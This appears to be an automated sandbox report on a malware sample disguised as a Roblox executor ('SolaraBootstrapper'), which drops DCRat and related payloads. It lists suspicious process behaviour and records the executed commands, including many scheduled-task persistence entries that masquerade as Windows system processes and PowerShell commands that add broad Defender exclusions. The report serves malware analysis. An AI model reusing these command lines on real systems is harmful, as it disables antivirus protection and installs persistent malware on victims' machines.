N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A N/A N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\winNet\ComContainerbrowserRefRuntime.exe N/A
N/A N/A C:\winNet\ComContainerbrowserRefRuntime.exe N/A
N/A N/A C:\winNet\ComContainerbrowserRefRuntime.exe N/A
N/A N/A C:\winNet\ComContainerbrowserRefRuntime.exe N/A
N/A N/A C:\winNet\ComContainerbrowserRefRuntime.exe N/A
N/A N/A C:\winNet\ComContainerbrowserRefRuntime.exe N/A
N/A N/A C:\winNet\ComContainerbrowserRefRuntime.exe N/A
N/A N/A C:\winNet\ComContainerbrowserRefRuntime.exe N/A
N/A N/A C:\winNet\ComContainerbrowserRefRuntime.exe N/A
N/A N/A C:\winNet\ComContainerbrowserRefRuntime.exe N/A
N/A N/A C:\winNet\ComContainerbrowserRefRuntime.exe N/A
N/A N/A C:\winNet\ComContainerbrowserRefRuntime.exe N/A
N/A N/A C:\winNet\ComContainerbrowserRefRuntime.exe N/A
N/A N/A C:\winNet\ComContainerbrowserRefRuntime.exe N/A
N/A N/A C:\winNet\ComContainerbrowserRefRuntime.exe N/A
N/A N/A C:\winNet\ComContainerbrowserRefRuntime.exe N/A
N/A N/A C:\winNet\ComContainerbrowserRefRuntime.exe N/A
N/A N/A C:\DriversavessessionDlldhcp\Roblox.exe N/A
N/A N/A C:\DriversavessessionDlldhcp\Roblox.exe N/A
N/A N/A C:\DriversavessessionDlldhcp\Roblox.exe N/A
N/A N/A C:\DriversavessessionDlldhcp\Roblox.exe N/A
N/A N/A C:\DriversavessessionDlldhcp\Roblox.exe N/A
N/A N/A C:\DriversavessessionDlldhcp\Roblox.exe N/A
N/A N/A C:\DriversavessessionDlldhcp\Roblox.exe N/A
N/A N/A C:\DriversavessessionDlldhcp\Roblox.exe N/A
N/A N/A C:\DriversavessessionDlldhcp\Roblox.exe N/A
N/A N/A C:\DriversavessessionDlldhcp\Roblox.exe N/A
N/A N/A C:\DriversavessessionDlldhcp\Roblox.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\csrss.exe N/A
N/A N/A C:\Users\All Users\Microsoft\IdentityCRL\audiodg.exe N/A
N/A N/A C:\winNet\wscript.exe.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\conhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2756 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe C:\Users\Admin\AppData\Local\Temp\Youtube.exe
PID 2756 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe C:\Users\Admin\AppData\Local\Temp\Youtube.exe
PID 2756 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe C:\Users\Admin\AppData\Local\Temp\Youtube.exe
PID 2756 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe C:\Users\Admin\AppData\Local\Temp\Youtube.exe
PID 2756 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe C:\Users\Admin\AppData\Local\Temp\Youtube.exe
PID 2756 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe C:\Users\Admin\AppData\Local\Temp\Youtube.exe
PID 2756 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe C:\Users\Admin\AppData\Local\Temp\Youtube.exe
PID 2756 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe
PID 2756 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe
PID 2756 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe
PID 2756 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe
PID 2692 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Result.exe
PID 2692 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Result.exe
PID 2692 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Result.exe
PID 2692 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Result.exe
PID 2692 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Result.exe
PID 2692 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Result.exe
PID 2692 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Result.exe
PID 2692 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2692 wrote to memory of 1504 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe
PID 2544 wrote to memory of 2272 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
PID 2692 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Frage build.exe
PID 2544 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Users\Admin\AppData\Local\Temp\solara.exe
PID 2972 wrote to memory of 820 N/A C:\Users\Admin\AppData\Local\Temp\Frage build.exe C:\Windows\SysWOW64\WScript.exe
PID 2588 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe C:\Windows\SysWOW64\WScript.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe

"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"

C:\Users\Admin\AppData\Local\Temp\Youtube.exe

"C:\Users\Admin\AppData\Local\Temp\Youtube.exe"

C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe

"C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe"

C:\Users\Admin\AppData\Local\Temp\Result.exe

"C:\Users\Admin\AppData\Local\Temp\Result.exe"

C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe

"C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe"

C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe

"C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe"

C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe

"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"

C:\Users\Admin\AppData\Local\Temp\Frage build.exe

"C:\Users\Admin\AppData\Local\Temp\Frage build.exe"

C:\Users\Admin\AppData\Local\Temp\solara.exe

"C:\Users\Admin\AppData\Local\Temp\solara.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\DriversavessessionDlldhcp\ghJPtatrYDLygnNWh9dEZv.vbe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\winNet\we9fgyC144zVOkGk.vbe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\aImCrmZyeD77A2ANdrk.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\4F0VCIGGZPxdNa.bat" "

C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe

"C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 7 /tr "'C:\DriversavessessionDlldhcp\lsass.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\DriversavessessionDlldhcp\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 12 /tr "'C:\DriversavessessionDlldhcp\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 13 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\conhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 8 /tr "'C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\audiodg.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "audiodg" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\audiodg.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 9 /tr "'C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\audiodg.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RefcrtR" /sc MINUTE /mo 8 /tr "'C:\Windows\Offline Web Pages\Refcrt.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Refcrt" /sc ONLOGON /tr "'C:\Windows\Offline Web Pages\Refcrt.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RefcrtR" /sc MINUTE /mo 9 /tr "'C:\Windows\Offline Web Pages\Refcrt.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 13 /tr "'C:\Program Files\Microsoft Office\Office14\1033\dllhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office\Office14\1033\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Program Files\Microsoft Office\Office14\1033\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "BloxstrapB" /sc MINUTE /mo 9 /tr "'C:\winNet\Bloxstrap.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Bloxstrap" /sc ONLOGON /tr "'C:\winNet\Bloxstrap.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "BloxstrapB" /sc MINUTE /mo 10 /tr "'C:\winNet\Bloxstrap.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\audiodg.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "audiodg" /sc ONLOGON /tr "'C:\Users\All Users\audiodg.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 10 /tr "'C:\Users\All Users\audiodg.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsml" /sc MINUTE /mo 6 /tr "'C:\winNet\lsm.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsm" /sc ONLOGON /tr "'C:\winNet\lsm.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsml" /sc MINUTE /mo 9 /tr "'C:\winNet\lsm.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 10 /tr "'C:\Recovery\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\lsass.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Recovery\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 8 /tr "'C:\Recovery\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 9 /tr "'C:\winNet\wscript.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wscript" /sc ONLOGON /tr "'C:\winNet\wscript.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 5 /tr "'C:\winNet\wscript.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 14 /tr "'C:\Recovery\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\dllhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Recovery\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 10 /tr "'C:\Recovery\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\DriversavessessionDlldhcp\csrss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\DriversavessessionDlldhcp\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\DriversavessessionDlldhcp\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 13 /tr "'C:\Windows\de-DE\WmiPrvSE.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\de-DE\WmiPrvSE.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 6 /tr "'C:\Windows\de-DE\WmiPrvSE.exe'" /rl HIGHEST /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\DriversavessessionDlldhcp\lsass.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\conhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\audiodg.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Offline Web Pages\Refcrt.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office\Office14\1033\dllhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\Bloxstrap.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\audiodg.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\lsm.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\lsass.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\wscript.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\dllhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\DriversavessessionDlldhcp\csrss.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\de-DE\WmiPrvSE.exe'

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\KAuKjb5uOJ.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\SysWOW64\msiexec.exe

"msiexec" /i "C:\Users\Admin\AppData\Local\Temp\node-v18.16.0-x64.msi" /qn

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\system32\MsiExec.exe

C:\Windows\system32\MsiExec.exe -Embedding 85A41532DC1B4ED986F185DC47A3340F

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 9924FCA711D0C7FDDBC022E9B16DDBDF

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2272 -s 1548

C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe

"C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe"

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "servicess" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\services.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\services.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "servicess" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\services.exe'" /rl HIGHEST /f

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorere" /sc MINUTE /mo 11 /tr "'C:\Windows\Downloaded Program Files\explorer.exe'" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Windows\System32\cmd.exe

"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "Bloxstrap" /tr "C:\Users\Admin\Bloxstrap.exe"

C:\Windows\system32\schtasks.exe

